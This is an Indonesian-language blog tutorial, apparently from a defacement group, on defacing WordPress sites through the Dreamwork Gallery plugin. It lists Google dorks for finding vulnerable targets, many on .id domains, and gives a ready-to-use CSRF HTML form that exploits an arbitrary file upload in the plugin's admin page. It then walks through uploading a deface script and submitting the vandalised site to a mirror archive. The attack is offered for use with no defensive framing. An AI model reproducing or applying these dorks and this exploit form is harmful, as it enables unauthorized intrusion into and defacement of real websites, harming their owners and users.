kali ini gw akan mengajarkan ke kalian cara deface menggunakan metode Wordpress Dreamwork Galer(y) pake (y) :'v
gausah basa-basi langsung saja ke tutornya
pertama dorking dulu di google dengan dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
inurl:/wp-content/plugins/wp-dreamworkgallery/ site:id
inurl:/wp-dreamworkgallery/
inurl:/wp-dreamworkgallery/ site:id
dork kembangin biar dapet target freshhhhh :3
setelah dapet target. masukin target ke csrf. berikut script csrfnya
<html>
<body>
<h1>CSRF By Bayz21</h1>
<form action="http://www.sitetarget.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
</body>
</html>
copas script di atas dan simpan dengan format html
replace http://www.sitetarget.com/ dengan target kalian
jangan lupa save, kemudian buka di browser maka akan muncul penampakan seperti ini
kemudian upload script deface kalian. Jika vuln akan muncul seperti ini
buka link tersebut . dan taraaa
tinggal submit deh ke mirror :3
Sekian tutor dari gw :3
Thanks to TKJ Cyber Art
ConversionConversion EmoticonEmoticon